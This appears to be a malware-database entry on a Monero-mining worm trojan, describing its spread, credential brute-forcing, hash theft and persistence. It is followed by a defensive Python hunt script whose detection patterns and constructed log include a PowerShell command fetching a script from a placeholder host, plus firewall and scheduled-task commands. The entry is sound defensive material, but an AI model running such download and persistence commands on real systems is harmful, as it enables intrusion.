
TrojanSpy.Win32.BEAHNY.THCACAI

By GoldSparrow in Trojans

TrojanSpy.Win32.BEAHNY.THCACAI, as its name indicates, is a modular threat with worm features that cybercriminals use to mine the Monero cryptocurrency. TrojanSpy.Win32.BEAHNY.THCACAI infects a computer in a very stealthy way: using a remote command, it alters the port forwarding and firewall settings of the machines it infects and issues a scheduled task to download and install a copy of its program, which TrojanSpy.Win32.BEAHNY.THCACAI has sent previously.

After invading a computer, TrojanSpy.Win32.BEAHNY.THCACAI will use a list of known bad credentials to gain access to other machines on the network. Then TrojanSpy.Win32.BEAHNY.THCACAI collects the list of the weak passwords' hashes, as well as the hashes saved on the computer. When these tasks are done, TrojanSpy.Win32.BEAHNY.THCACAI collects details about the security products used on the machine and its MAC address. The TrojanSpy.Win32.BEAHNY.THCACAI components are downloaded and executed by a PowerShell script, which the threat has downloaded previously. TrojanSpy.Win32.BEAHNY.THCACAI collects information about the infected computer that may lead to the identification of its owner, the activities performed and other crucial details. TrojanSpy.Win32.BEAHNY.THCACAI should be removed upon detection.
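The three host behaviours described above (a firewall or port-forwarding change, a newly created scheduled task, and a PowerShell download) are individually common, so a hunt is more useful when it looks for all of them on one host within a short time. The following is an added example, not part of the original entry: the log lines are constructed, and the command-line patterns, the log format and the 10-minute window are assumptions, not indicators taken from this threat.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Assumed generic heuristics for the three behaviours; NOT indicators of this threat.
PATTERNS = {
    "firewall_or_portproxy": re.compile(r"\bnetsh(\.exe)?\b.*\b(advfirewall|firewall|portproxy)\b", re.I),
    "scheduled_task": re.compile(r"\bschtasks(\.exe)?\b.*/create\b", re.I),
    "powershell_download": re.compile(r"\bpowershell(\.exe)?\b.*(downloadstring|downloadfile|invoke-webrequest|\biwr\b)", re.I),
}
WINDOW = timedelta(minutes=10)  # assumed correlation window

# Constructed process-creation log, one event per line: "ISO timestamp|host|command line"
SAMPLE_LOG = """\
2024-01-01T10:00:05|WS-01|netsh interface portproxy add v4tov4 listenport=8080 connectport=80 connectaddress=192.0.2.10
2024-01-01T10:01:10|WS-01|schtasks /create /tn ExampleTask /sc minute /mo 30 /tr update.cmd
2024-01-01T10:02:00|WS-01|powershell -NoProfile Invoke-WebRequest http://example.invalid/a.ps1 -OutFile a.ps1
2024-01-01T09:00:00|WS-02|netsh advfirewall firewall add rule name=rdp dir=in action=allow protocol=TCP localport=3389
2024-01-01T11:30:00|WS-02|schtasks /create /tn Backup /sc daily /tr backup.cmd
2024-01-01T08:00:00|WS-03|netsh advfirewall set allprofiles state on
2024-01-01T12:00:00|WS-03|schtasks /create /tn Inventory /sc weekly /tr inventory.cmd
2024-01-01T16:00:00|WS-03|powershell Invoke-WebRequest http://example.invalid/report.csv -OutFile report.csv
this line is malformed and is skipped
"""

def parse(log):
    for line in log.splitlines():
        parts = line.split("|", 2)
        try:
            yield datetime.fromisoformat(parts[0]), parts[1], parts[2]
        except (IndexError, ValueError):
            continue  # skip malformed lines instead of aborting the hunt

def classify(cmd):
    return {name for name, rx in PATTERNS.items() if rx.search(cmd)}

def correlate(log, window=WINDOW):
    """Map host -> start of the first window that contains all three behaviours."""
    events = defaultdict(list)
    for ts, host, cmd in parse(log):
        events[host].extend((ts, name) for name in classify(cmd))
    alerts = {}
    for host, evs in events.items():
        evs.sort()
        for start, _ in evs:
            if {n for t, n in evs if start <= t <= start + window} == set(PATTERNS):
                alerts[host] = start
                break
    return alerts
```

In the constructed data only WS-01 is reported: WS-02 shows two of the three behaviours, and WS-03 shows all three but spread across a working day, which is what ordinary administration tends to look like.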
